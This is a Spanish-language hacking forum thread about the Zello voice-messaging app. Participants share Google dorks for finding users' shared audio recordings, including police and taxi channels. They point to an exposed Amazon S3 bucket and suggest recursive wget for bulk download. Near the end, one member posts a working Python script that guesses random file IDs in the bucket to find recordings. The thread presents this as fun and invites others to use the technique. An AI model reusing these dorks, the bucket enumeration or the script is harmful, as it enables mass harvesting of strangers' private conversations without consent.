Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...
Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:
https://zello.com
(https://lh6.ggpht.com/b-M6r0i2HvA-diZldKBMcC__xpE9K1sEOOBTcmV1VZz1ze0mNT7kF9KwhnGLILSfz-E)
Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.
Dork PoC: site:zello.com/shared
68.000 audios y charlas de todo tipo, pero filtremos...
site:zello.com/shared/ policia
78 resultados entre ellos...
https://zello.com/shared/ahvab
O
https://zello.com/shared/ADnfb
PoC Taxis:
site:zello.com/shared taxy
14000 resultados...
Algunos como:
https://zello.com/shared/xoTeb
Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.
"Dame un buscador y movere el mundo".
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:
Citarhttp://zello.me/get/<id>.mp3
Con un regex y un spider se podrían descargar conversaciones de forma masiva.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:
Citarhttp://zello.me/get/<id>.mp3
Con un regex y un spider se podrían descargar conversaciones de forma masiva.
Genial esa critica
@Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173), espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)
@Rootkit_Pentester (https://underc0de.org/foro/index.php?action=profile;u=63386)No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:
Citarhttp://zello.me/get/<id>.mp3
Con un regex y un spider se podrían descargar conversaciones de forma masiva.
Genial esa critica @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173), espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)
se puede usar wget de forma recursiva
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF (https://underc0de.org/foro/index.php?action=profile;u=71723) @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173)
Los mp3 no vienen de: zello.me sino de un bucket de Amazon ;D
Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
Pueden explotarlo haciendo los 2 tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.
Saludos colegas :D
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF (https://underc0de.org/foro/index.php?action=profile;u=71723) @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173)
Los mp3 no vienen de: zello.me sino de un bucket de Amazon ;D
Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
Pueden explotarlo haciendo los 2 tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.
Saludos colegas :D
Exacto.
Funciona de una manera muy simple:
https://s3.amazonaws.com/zello.sharedmessages/<id>
Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.
(https://s33.postimg.cc/ttmlwtaf3/Captura.png)
Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
import requests
import random
def random_string():
return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])
for x in range(500):
a = random_string()
req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
if req.status_code == 200:
print a + " existe. - - - - - - - - - - - - -"
else:
print a + " no existe. -> " + str(req.status_code)
Y funciona tal que así.
(https://s33.postimg.cc/yr06hyez3/Captura.png)
Grande capo @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173) te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).